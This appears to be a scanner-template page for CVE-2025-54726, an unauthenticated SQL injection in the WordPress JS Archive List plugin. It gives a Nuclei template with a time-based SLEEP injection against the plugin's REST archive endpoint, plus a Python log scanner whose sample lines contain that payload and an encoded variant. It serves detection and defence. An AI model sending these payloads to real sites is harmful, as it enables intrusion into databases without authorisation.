
WordPress JS Archive List <= 6.1.5 - SQL Injection

CVE-2025-54726
Verified

Description

The JS Archive List WordPress plugin by Miguel Useche (versions up to and including 6.1.5) contains an SQL injection caused by improper neutralization of special elements used in an SQL command, letting an unauthenticated attacker execute arbitrary SQL queries; exploitation requires crafted input.

Severity

High

CVSS Score

7.5

Exploit Probability

1%

Published Date

February 13, 2026

Template Author

shivam kamboj

CVE-2025-54726.yaml
id: CVE-2025-54726

info:
  name: WordPress JS Archive List <= 6.1.5 - SQL Injection
  author: Shivam Kamboj
  severity: high
  description: |
    Miguel Useche JS Archive List contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  remediation: |
    Update to the latest version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jquery-archive-list-widget/js-archive-list-615-unauthenticated-sql-injection
    - https://patchstack.com/database/wordpress/plugin/jquery-archive-list-widget/vulnerability/wordpress-js-archive-list-plugin-6-1-6-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54726
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-54726
    epss-score: 0.00924
    epss-percentile: 0.76259
    cwe-id: CWE-89
    cpe: cpe:2.3:a:flavor:js_archive_list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="jquery-archive-list-widget"
  tags: cve,cve2025,wordpress,wp,wp-plugin,sqli,jquery-archive-list-widget,unauth,vkev

http:
  - raw:
      - |
        @timeout: 20s
        GET /wp-json/jalw/v1/archive?cats=if(now()=sysdate(),SLEEP(6),0)&exclusionType=exclude HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains_all(body, "years","expand")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a00473045022033ae9ffc1b1d1ff6ccab3555ed5d103a76629f43abcdbe0217119eedf1e2dcf102210082b66d371b0f90e6d7535a28ccd664f0a13069154480aefdfbbc045dab3e9247:922c64590222798bb761d5b6d8e72950
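The template above confirms the flaw with a time-based probe against the `cats` parameter of the `/wp-json/jalw/v1/archive` endpoint. As an added example (not part of the template, the plugin, or the original page), the Python below scans web-server access-log lines in the combined log format for requests to that endpoint whose `cats` value is anything other than a comma-separated list of integer category IDs; that the parameter legitimately carries only integer IDs is an assumption, and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Feb/2026:10:00:01 +0000] "GET /wp-json/jalw/v1/archive?cats=3,7&exclusionType=exclude HTTP/1.1" 200 512
203.0.113.11 - - [13/Feb/2026:10:00:02 +0000] "GET /wp-json/jalw/v1/archive?cats=if(now()=sysdate(),SLEEP(6),0)&exclusionType=exclude HTTP/1.1" 200 512
203.0.113.12 - - [13/Feb/2026:10:00:03 +0000] "GET /wp-json/jalw/v1/archive?cats=1%2C2%29%20OR%20SLEEP%285%29--&exclusionType=exclude HTTP/1.1" 200 512
203.0.113.13 - - [13/Feb/2026:10:00:04 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 2048
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# REST route used by the vulnerable plugin (taken from the template's request).
ENDPOINT = "/wp-json/jalw/v1/archive"

# Assumption: a legitimate cats filter is a comma-separated list of integer IDs.
VALID_CATS = re.compile(r"^\d+(,\d+)*$")


def suspicious_requests(log_text):
    """Return one record per request whose cats parameter is not a plain ID list."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group("target"))
        if parts.path.rstrip("/") != ENDPOINT:
            continue  # only the archive endpoint is of interest here
        for value in parse_qs(parts.query, keep_blank_values=True).get("cats", []):
            value = unquote(value)  # second decode catches double-encoded payloads
            if not VALID_CATS.match(value):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"), "cats": value})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} cats={hit["cats"]!r}')
```

The first sample line (plain IDs) and the unrelated `wp/v2/posts` request are ignored; the template's own payload and the URL-encoded variant are both reported.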

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2025-54726
CWE ID: CWE-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jquery-archive-list-widget/js-archive-list-615-unauthenticated-sql-injection
https://patchstack.com/database/wordpress/plugin/jquery-archive-list-widget/vulnerability/wordpress-js-archive-list-plugin-6-1-6-sql-injection-vulnerability
https://nvd.nist.gov/vuln/detail/CVE-2025-54726

Remediation Steps

Update to the latest version.